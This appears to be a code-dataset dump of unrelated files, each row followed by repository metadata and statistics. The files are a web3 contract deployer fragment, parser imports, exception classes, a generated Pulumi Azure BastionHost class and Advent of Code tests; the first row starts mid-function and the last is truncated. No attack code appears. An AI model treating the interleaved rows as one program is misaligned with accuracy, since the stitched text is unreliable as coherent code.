"transactionHash": self.web3.toHex(tx_hash)
}
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s done!" % contract_name, _type="success")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="success")
console_log(title="Address", space=True,
text=str(address), _type="success")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
except web3.utils.threads.Timeout as timeout:
address = "Unknown"
deployed = {
"links": dict(),
"contractAddress": address,
"transactionHash": self.web3.toHex(tx_hash)
}
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s not done!" % contract_name, _type="warning")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="warning")
console_log(title="Address", space=True,
text=str(address), _type="warning")
console_log(title="Timeout", _type="error",
text="%s, %s still on mining!" % (str(timeout),
str(self.web3.toHex(tx_hash))))
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
else:
console_log(title="Deploy", text="%s already deployed." %
contract_name, _type="warning")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
| 49.528345 | 120 | 0.489149 | 1,793 | 21,842 | 5.766313 | 0.090351 | 0.037915 | 0.027662 | 0.019731 | 0.825515 | 0.780443 | 0.758391 | 0.742818 | 0.723087 | 0.723087 | 0 | 0.009494 | 0.416491 | 21,842 | 440 | 121 | 49.640909 | 0.801726 | 0.008058 | 0 | 0.800487 | 0 | 0 | 0.092424 | 0.004432 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019465 | false | 0 | 0.004866 | 0 | 0.082725 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
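The deployer's `ValueError` handler above unpacks `args[0]`, then branches on whether the payload is a JSON-RPC style dict with a `'message'` key and on a `more` verbosity flag. That pattern can be sketched as a standalone helper — the function name and the `verbose` parameter are invented for illustration, not part of the tool:

```python
def first_error_line(exc: ValueError, verbose: bool = False) -> str:
    """Extract a printable message from a web3-style ValueError.

    JSON-RPC errors usually arrive as a dict with a 'message' key;
    anything else is stringified and truncated unless verbose is set.
    """
    payload = exc.args[0] if exc.args else ""
    if isinstance(payload, dict) and "message" in payload:
        message = str(payload["message"])
        # Terse mode keeps only the first line of a multi-line RPC error
        return message if verbose else message.split("\n")[0]
    message = str(payload)
    return message if verbose else message[:75] + "..."
```

Folding the four branches into one helper keeps the logging call sites to a single `console_log(first_error_line(err, self.more), "error")`.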
2e719f02b32505168181c2764a8572938755d339 | 265 | py | Python | .modules/.metagoofil/hachoir_parser/program/__init__.py | termux-one/EasY_HaCk | 0a8d09ca4b126b027b6842e02fa0c29d8250e090 | [
"Apache-2.0"
] | 1,103 | 2018-04-20T14:08:11.000Z | 2022-03-29T06:22:43.000Z | .modules/.metagoofil/hachoir_parser/program/__init__.py | sshourya948/EasY_HaCk | 0a8d09ca4b126b027b6842e02fa0c29d8250e090 | [
"Apache-2.0"
] | 29 | 2019-04-03T14:52:38.000Z | 2022-03-24T12:33:05.000Z | .modules/.metagoofil/hachoir_parser/program/__init__.py | sshourya948/EasY_HaCk | 0a8d09ca4b126b027b6842e02fa0c29d8250e090 | [
"Apache-2.0"
] | 262 | 2017-09-16T22:15:50.000Z | 2022-03-31T00:38:42.000Z | from hachoir_parser.program.elf import ElfFile
from hachoir_parser.program.exe import ExeFile
from hachoir_parser.program.python import PythonCompiledFile
from hachoir_parser.program.java import JavaCompiledClassFile
from hachoir_parser.program.prc import PRCFile
| 37.857143 | 61 | 0.883019 | 35 | 265 | 6.542857 | 0.428571 | 0.240175 | 0.371179 | 0.524017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079245 | 265 | 6 | 62 | 44.166667 | 0.938525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5cf2403093ccc2c3e1832259a760a5ed2b27f1d6 | 138 | py | Python | pptb/__init__.py | hanknewbird/paddle-toolbox | 1f1e4d2dd38e797092c1bba0ec3797dd4bef43f6 | [
"Apache-2.0",
"MIT"
] | 1 | 2021-12-08T03:50:11.000Z | 2021-12-08T03:50:11.000Z | pptb/__init__.py | hanknewbird/paddle-toolbox | 1f1e4d2dd38e797092c1bba0ec3797dd4bef43f6 | [
"Apache-2.0",
"MIT"
] | null | null | null | pptb/__init__.py | hanknewbird/paddle-toolbox | 1f1e4d2dd38e797092c1bba0ec3797dd4bef43f6 | [
"Apache-2.0",
"MIT"
] | null | null | null | from pptb.utils.version_checker import assert_version_greater_equal
__version__ = "0.1.9-alpha.1"
assert_version_greater_equal("2.1.2")
| 23 | 67 | 0.818841 | 23 | 138 | 4.434783 | 0.608696 | 0.254902 | 0.392157 | 0.490196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054688 | 0.072464 | 138 | 5 | 68 | 27.6 | 0.742188 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
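`assert_version_greater_equal` is only imported in this record, so its body is not shown. A hedged sketch of what such a checker might do — the two-argument signature and the pre-release handling are assumptions; the real helper presumably discovers the installed Paddle version itself:

```python
def parse_version(version: str) -> tuple:
    """Turn '0.1.9-alpha.1' into (0, 1, 9); the pre-release tag after '-' is ignored."""
    core = version.split("-")[0]
    return tuple(int(part) for part in core.split("."))

def assert_version_greater_equal(actual: str, minimum: str) -> None:
    """Raise if the actual version is older than the required minimum."""
    if parse_version(actual) < parse_version(minimum):
        raise AssertionError(
            "version %s is older than required %s" % (actual, minimum))
```

Tuple comparison gives the usual lexicographic version ordering, so `(2, 2, 0) >= (2, 1, 2)` holds without any special-casing.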
5cf46a66ee3e09b1ad2197fff1dafa51b98ad8e4 | 191 | py | Python | bugger/exceptions.py | catharsis/bugger | e8d43eaa9f3197d06bf31a651171baed6cd45c7c | [
"BSD-2-Clause"
] | 1 | 2016-04-30T18:11:55.000Z | 2016-04-30T18:11:55.000Z | bugger/exceptions.py | catharsis/bugger | e8d43eaa9f3197d06bf31a651171baed6cd45c7c | [
"BSD-2-Clause"
] | 1 | 2019-03-01T21:51:42.000Z | 2019-03-01T21:51:42.000Z | bugger/exceptions.py | catharsis/bugger | e8d43eaa9f3197d06bf31a651171baed6cd45c7c | [
"BSD-2-Clause"
] | null | null | null | class NoPaging(Exception): pass
class BuggerLoginError(Exception): pass
class BugNotFound(Exception): pass
class BugRenderError(Exception): pass
class BackendConnectionError(Exception): pass
| 31.833333 | 45 | 0.842932 | 20 | 191 | 8.05 | 0.4 | 0.403727 | 0.447205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078534 | 191 | 5 | 46 | 38.2 | 0.914773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
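Flat `Exception` subclasses like these act as typed error channels: callers catch the specific failure they can handle and let the rest propagate. A minimal usage sketch — the `fetch_bug` helper is invented for illustration and not part of the package:

```python
class BugNotFound(Exception):
    pass

def fetch_bug(bugs: dict, bug_id: int) -> str:
    """Look up a bug, translating a missing key into the domain exception."""
    try:
        return bugs[bug_id]
    except KeyError:
        # 'from None' hides the internal KeyError from the traceback
        raise BugNotFound(bug_id) from None
```

Catching `BugNotFound` at the call site then distinguishes "no such bug" from genuinely unexpected errors.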
cf11131259414c6c3f02d8aebba4103ceb9f2c53 | 20,677 | py | Python | sdk/python/pulumi_azure/compute/bastion_host.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/compute/bastion_host.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/compute/bastion_host.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BastionHostArgs', 'BastionHost']
@pulumi.input_type
class BastionHostArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
ip_configuration: Optional[pulumi.Input['BastionHostIpConfigurationArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a BastionHost resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input['BastionHostIpConfigurationArgs'] ip_configuration: An `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if ip_configuration is not None:
pulumi.set(__self__, "ip_configuration", ip_configuration)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the Bastion Host.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> Optional[pulumi.Input['BastionHostIpConfigurationArgs']]:
"""
An `ip_configuration` block as defined below.
"""
return pulumi.get(self, "ip_configuration")
@ip_configuration.setter
def ip_configuration(self, value: Optional[pulumi.Input['BastionHostIpConfigurationArgs']]):
pulumi.set(self, "ip_configuration", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _BastionHostState:
def __init__(__self__, *,
dns_name: Optional[pulumi.Input[str]] = None,
ip_configuration: Optional[pulumi.Input['BastionHostIpConfigurationArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering BastionHost resources.
:param pulumi.Input[str] dns_name: The FQDN for the Bastion Host.
:param pulumi.Input['BastionHostIpConfigurationArgs'] ip_configuration: An `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if dns_name is not None:
pulumi.set(__self__, "dns_name", dns_name)
if ip_configuration is not None:
pulumi.set(__self__, "ip_configuration", ip_configuration)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> Optional[pulumi.Input[str]]:
"""
The FQDN for the Bastion Host.
"""
return pulumi.get(self, "dns_name")
@dns_name.setter
def dns_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_name", value)
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> Optional[pulumi.Input['BastionHostIpConfigurationArgs']]:
"""
An `ip_configuration` block as defined below.
"""
return pulumi.get(self, "ip_configuration")
@ip_configuration.setter
def ip_configuration(self, value: Optional[pulumi.Input['BastionHostIpConfigurationArgs']]):
pulumi.set(self, "ip_configuration", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the Bastion Host.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class BastionHost(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_configuration: Optional[pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Bastion Host.
## Example Usage
This example deploys an Azure Bastion Host Instance to a target virtual network.
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["192.168.1.0/24"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["192.168.1.224/27"])
example_public_ip = azure.network.PublicIp("examplePublicIp",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
allocation_method="Static",
sku="Standard")
example_bastion_host = azure.compute.BastionHost("exampleBastionHost",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configuration=azure.compute.BastionHostIpConfigurationArgs(
name="configuration",
subnet_id=example_subnet.id,
public_ip_address_id=example_public_ip.id,
))
```
## Import
Bastion Hosts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:compute/bastionHost:BastionHost example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/bastionHosts/instance1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']] ip_configuration: An `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BastionHostArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Bastion Host.
## Example Usage
This example deploys an Azure Bastion Host Instance to a target virtual network.
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["192.168.1.0/24"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["192.168.1.224/27"])
example_public_ip = azure.network.PublicIp("examplePublicIp",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
allocation_method="Static",
sku="Standard")
example_bastion_host = azure.compute.BastionHost("exampleBastionHost",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configuration=azure.compute.BastionHostIpConfigurationArgs(
name="configuration",
subnet_id=example_subnet.id,
public_ip_address_id=example_public_ip.id,
))
```
## Import
Bastion Hosts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:compute/bastionHost:BastionHost example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/bastionHosts/instance1
```
:param str resource_name: The name of the resource.
:param BastionHostArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BastionHostArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_configuration: Optional[pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BastionHostArgs.__new__(BastionHostArgs)
__props__.__dict__["ip_configuration"] = ip_configuration
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["dns_name"] = None
super(BastionHost, __self__).__init__(
'azure:compute/bastionHost:BastionHost',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
dns_name: Optional[pulumi.Input[str]] = None,
ip_configuration: Optional[pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'BastionHost':
"""
Get an existing BastionHost resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dns_name: The FQDN for the Bastion Host.
:param pulumi.Input[pulumi.InputType['BastionHostIpConfigurationArgs']] ip_configuration: An `ip_configuration` block as defined below.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
:param pulumi.Input[str] name: Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Bastion Host.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BastionHostState.__new__(_BastionHostState)
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["ip_configuration"] = ip_configuration
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
return BastionHost(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> pulumi.Output[str]:
"""
The FQDN for the Bastion Host.
"""
return pulumi.get(self, "dns_name")
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> pulumi.Output[Optional['outputs.BastionHostIpConfiguration']]:
"""
An `ip_configuration` block as defined below.
"""
return pulumi.get(self, "ip_configuration")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created. Review [Azure Bastion Host FAQ](https://docs.microsoft.com/en-us/azure/bastion/bastion-faq) for supported locations.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Bastion Host. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the Bastion Host.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 46.257271 | 277 | 0.663104 | 2,407 | 20,677 | 5.48899 | 0.089738 | 0.073267 | 0.063579 | 0.046624 | 0.862019 | 0.848395 | 0.834847 | 0.821299 | 0.817439 | 0.807826 | 0 | 0.007168 | 0.237607 | 20,677 | 446 | 278 | 46.360987 | 0.830944 | 0.419258 | 0 | 0.711712 | 1 | 0 | 0.111826 | 0.033762 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157658 | false | 0.004505 | 0.031532 | 0 | 0.283784 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
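`BastionHost.__init__` above dispatches between its two overloads by checking whether the caller passed a `BastionHostArgs` object or plain keyword arguments, then `_internal_init` validates the required `resource_group_name`. The mechanism can be sketched generically — all names here are hypothetical, not the Pulumi SDK's API:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class HostArgs:
    resource_group_name: str
    location: Optional[str] = None

def create_host(resource_name, *args, **kwargs):
    """Accept either a single HostArgs object or bare keyword arguments."""
    if args and isinstance(args[0], HostArgs):
        # args-object form: unpack its fields into the property map
        props = dict(args[0].__dict__)
    else:
        props = dict(kwargs)
    if props.get("resource_group_name") is None:
        raise TypeError("Missing required property 'resource_group_name'")
    return resource_name, props
```

Both call styles end up in the same validation path, which is why the generated class only needs one `_internal_init`.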
cf476ab2918076b88e72c27bf0e9bca6b1d1e482 | 2,273 | py | Python | tests/test_p02.py | vlasovskikh/advent-of-code-2021 | 2aa6ef98535f22a2d6b07662375b67a4fa2a3a69 | [
"MIT"
] | 4 | 2021-11-30T19:16:56.000Z | 2022-01-10T13:34:53.000Z | tests/test_p02.py | vlasovskikh/advent-of-code-2021 | 2aa6ef98535f22a2d6b07662375b67a4fa2a3a69 | [
"MIT"
] | null | null | null | tests/test_p02.py | vlasovskikh/advent-of-code-2021 | 2aa6ef98535f22a2d6b07662375b67a4fa2a3a69 | [
"MIT"
] | null | null | null | from aoc21.p02 import execute_submarine_commands
def test_empty():
assert execute_submarine_commands([], use_aim=False) == (0, 0)
assert execute_submarine_commands([], use_aim=True) == (0, 0)
def test_single_forward():
assert (
execute_submarine_commands(
[
("forward", 5),
],
use_aim=False,
)
== (5, 0)
)
assert (
execute_submarine_commands(
[
("forward", 5),
],
use_aim=True,
)
== (5, 0)
)
def test_single_down():
assert (
execute_submarine_commands(
[
("down", 5),
],
use_aim=False,
)
== (0, 5)
)
assert (
execute_submarine_commands(
[
("down", 5),
],
use_aim=True,
)
== (0, 0)
)
def test_single_up():
assert (
execute_submarine_commands(
[
("up", 5),
],
use_aim=False,
)
== (0, -5)
)
assert (
execute_submarine_commands(
[
("up", 5),
],
use_aim=True,
)
== (0, 0)
)
def test_simple_combination():
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
],
use_aim=False,
)
== (3, 4)
)
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
],
use_aim=True,
)
== (3, 0)
)
def test_complex_combination():
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
("forward", 5),
("up", 2),
],
use_aim=False,
)
== (8, 2)
)
assert (
execute_submarine_commands(
[
("forward", 3),
("down", 4),
("forward", 5),
("up", 2),
],
use_aim=True,
)
== (8, 20)
)
| 18.941667 | 66 | 0.361197 | 174 | 2,273 | 4.436782 | 0.166667 | 0.26943 | 0.404145 | 0.466321 | 0.812176 | 0.809585 | 0.724093 | 0.724093 | 0.42487 | 0.396373 | 0 | 0.042304 | 0.511219 | 2,273 | 119 | 67 | 19.10084 | 0.652565 | 0 | 0 | 0.579439 | 0 | 0 | 0.038715 | 0 | 0 | 0 | 0 | 0 | 0.11215 | 1 | 0.056075 | true | 0 | 0.009346 | 0 | 0.065421 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
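The assertions above fully determine both command semantics (with and without aim). A minimal implementation consistent with every case — a sketch, not necessarily the project's actual `aoc21.p02` code — would be:

```python
def execute_submarine_commands(commands, use_aim):
    """Fold (direction, amount) pairs into a (horizontal, depth) pair."""
    horizontal = depth = aim = 0
    for direction, amount in commands:
        if direction == "forward":
            horizontal += amount
            if use_aim:
                # With aim, forward motion also dives by aim * amount
                depth += aim * amount
        elif direction == "down":
            if use_aim:
                aim += amount
            else:
                depth += amount
        elif direction == "up":
            if use_aim:
                aim -= amount
            else:
                depth -= amount
    return horizontal, depth
```

Without aim, `down`/`up` move depth directly; with aim they only tilt the submarine, and depth changes on `forward`.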
d86b47b5c0a0af1d4d191de211e9cd27953f0146 | 2,624 | py | Python | Week 5/decorator.py | rmit-s3559384-andrew-alvaro/IoT | ec444d0b037ddbd2e3aab01c34ea57fd2bd51d5f | [
"MIT"
] | null | null | null | Week 5/decorator.py | rmit-s3559384-andrew-alvaro/IoT | ec444d0b037ddbd2e3aab01c34ea57fd2bd51d5f | [
"MIT"
] | 1 | 2021-06-01T23:39:58.000Z | 2021-06-01T23:39:58.000Z | Week 5/decorator.py | AndrewAlvaro/IoT | ec444d0b037ddbd2e3aab01c34ea57fd2bd51d5f | [
"MIT"
